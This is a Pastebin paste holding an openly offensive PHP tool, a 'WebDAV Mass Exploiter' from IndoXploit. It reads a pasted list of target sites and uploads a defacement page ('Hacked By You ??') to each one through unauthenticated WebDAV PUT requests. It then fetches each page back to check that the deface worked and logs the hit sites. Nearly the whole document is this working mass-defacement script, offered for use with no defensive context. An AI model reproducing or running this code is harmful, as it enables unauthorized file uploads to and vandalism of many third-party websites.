Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- # ===============================
- # ===============================
- # ===============================
- # web version
- ?>
- <head><title>WebDAV Mass Exploiter</title></head>
- <style>
- body { font-family: Atma }
- input, textarea { font-family: Atma }
- th { background:black;color:#fff;padding:3px;font-family: Suez One}
- </style>
- <link href='http://fonts.googleapis.com/css?family=Atma' rel='stylesheet' type='text/css'/>
- <link href='http://fonts.googleapis.com/css?family=Suez+One' rel='stylesheet' type='text/css'/>
- <center>
- <table><tr><th>WebDAV Exploiter IndoXploit</th></tr> <tr><td><form action="" method="POST">
- <textarea name="isi" style="height:100px;width:500px"></textarea><br><br>
- <textarea name="isi1" style="height:100px;width:500px">Hacked By You ??</textarea><br><br>
- <input type="hidden" name="site" value="list.txt">
- <input type="hidden" name="file" value="x.htm">
- <center><input type="submit" style="background:black;color:#fff;padding:3px;border:0" name="go" value="<< Execute >>"></center>
- </form>
- </td></tr></table>
- <table> <tr><th>Result Deface</th></tr> <tr><td>
- <div style="border:1px solid black;border-bottom:5px solid black; padding:3px;height:auto;width:500px">
- <?php
- if($_POST['go']){
- $nama = "x.htm";
- $isi = $_POST['isi1'];
- $fp = fopen($nama,"w");
- fputs($fp, $isi);
- $nama = "list.txt";
- $isi = $_POST['isi'];
- $fp = fopen($nama,"w");
- fputs($fp, $isi);
- ?>
- <?php
- # IndoXploit
- # thx @AdeRoot | magelang6etar
- # blog.indoxploit.or.id
- $sites = $_POST[site];
- $file = $_POST[file];
- $fp = fopen($file, "r");
- $buka=fopen("$sites","r");
- $filesize = filesize($file);
- $size=filesize("$sites");
- $baca=fread($buka,$size);
- $sites = explode("\r\n", $baca);
- foreach($sites as $site){
- if(preg_match("#http://#", $site)) {
- $site = $site;
- } else {
- $site = "http://".$site;
- }
- $site = "$site/$file";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $site);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0");
- curl_setopt($ch, CURLOPT_PUT, true);
- curl_setopt($ch, CURLOPT_INFILE, $fp);
- curl_setopt($ch, CURLOPT_INFILESIZE, $filesize);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $exec = curl_exec($ch);
- echo "$site -> ";
- $su = curill($site);
- if(preg_match("/hacked/i", $su)) {
- echo "<font color=green>Success</font><br>\n\n";
- file_put_contents("webdav_shell.htm", "$site<br>", FILE_APPEND);
- } else {
- echo "<font color=red>Failed</font><br>\n";
- }
- }
- }
- function curill($site){
- $ch = curl_init ("$site");
- curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
- $data3 = curl_exec ($ch);
- return $data3;
- }
- ?>
- </div>
- </td></tr>
- <tr><th>Web Version</th></tr></table></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement